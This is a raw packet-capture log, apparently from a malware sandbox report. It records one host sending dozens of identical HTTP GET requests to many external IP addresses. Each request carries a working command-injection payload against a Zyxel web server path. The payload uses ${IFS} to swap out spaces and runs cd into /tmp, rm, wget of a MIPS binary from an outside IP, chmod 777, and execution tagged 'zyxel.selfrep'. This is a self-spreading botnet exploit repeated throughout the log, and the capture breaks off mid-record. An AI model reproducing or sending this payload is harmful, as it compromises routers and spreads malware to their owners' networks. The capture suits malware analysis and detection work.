                                              Jan 29, 2024 07:03:53.071561098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5127192.168.2.144010014.40.174.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071604967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5128192.168.2.1441164209.253.114.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071640015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5129192.168.2.1448464159.227.247.108443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071681976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5130192.168.2.1451538184.194.171.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071706057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5131192.168.2.1454124188.124.96.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071747065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5132192.168.2.1458676145.155.201.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071773052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5133192.168.2.1458534117.85.145.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071803093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5134192.168.2.1446596196.138.40.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071834087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5135192.168.2.1444264106.220.204.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071867943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5136192.168.2.145961292.200.23.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071896076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5137192.168.2.143416457.180.31.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071918011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5138192.168.2.1445112167.223.6.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071948051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5139192.168.2.145960285.190.198.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071988106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5140192.168.2.144306060.4.156.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072030067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5141192.168.2.1439566141.227.108.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072068930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5142192.168.2.143905834.20.77.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072118998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5143192.168.2.1455538120.117.29.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072144985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5144192.168.2.145326674.66.150.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072173119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5145192.168.2.143660432.241.191.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072205067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5146192.168.2.1438332103.30.162.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072220087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5147192.168.2.1444400158.241.31.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072258949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5148192.168.2.143744489.66.177.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072295904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5149192.168.2.144861072.110.52.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072341919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5150192.168.2.143726450.50.228.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072374105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5151192.168.2.1440632190.110.225.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072427034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5152192.168.2.143555690.238.101.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072451115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5153192.168.2.1458068117.198.212.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072480917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5154192.168.2.145792266.40.58.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072526932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5155192.168.2.1447402103.90.30.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072571039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5156192.168.2.1437240104.103.175.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072603941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5157192.168.2.1452508146.127.13.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072645903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5158192.168.2.146023439.143.73.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072679043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5159192.168.2.1448818121.246.66.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072734118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5160192.168.2.1448552159.142.84.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072748899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5161192.168.2.144770224.119.211.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072777987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5162192.168.2.1459388145.138.7.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072824001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5163192.168.2.1442130211.183.23.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072873116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5164192.168.2.1447504150.131.162.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072915077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5165192.168.2.1441012189.164.15.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072930098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5166192.168.2.144678437.230.212.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.072994947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5167192.168.2.1455136187.218.54.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073002100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5168192.168.2.1450764143.148.245.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073024035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5169192.168.2.1445902222.58.211.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073081017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5170192.168.2.1447432167.194.80.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073097944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5171192.168.2.1441216137.179.120.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073143959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5172192.168.2.1439328159.213.12.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073187113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5173192.168.2.1459146180.191.37.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073234081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5174192.168.2.1455016158.82.176.58443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073282957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5175192.168.2.143301261.63.121.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073323965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5176192.168.2.1449550136.40.192.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073358059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5177192.168.2.143732025.185.193.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073402882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5178192.168.2.145939053.34.235.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073430061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5179192.168.2.1436192167.159.66.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073458910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5180192.168.2.1454902140.238.27.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073493958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5181192.168.2.1435582176.61.21.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073525906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5182192.168.2.144548248.255.246.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073570967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5183192.168.2.1442416164.79.44.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073620081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5184192.168.2.1443210126.214.194.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073643923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5185192.168.2.144679085.211.60.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073674917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5186192.168.2.145055078.228.55.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073734999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5187192.168.2.144275631.150.218.250443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073743105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5188192.168.2.145346871.233.255.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073776007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5189192.168.2.1442138206.197.146.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.073824883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5190192.168.2.144879680.112.13.225443
                                              TimestampBytes transferredDirectionData
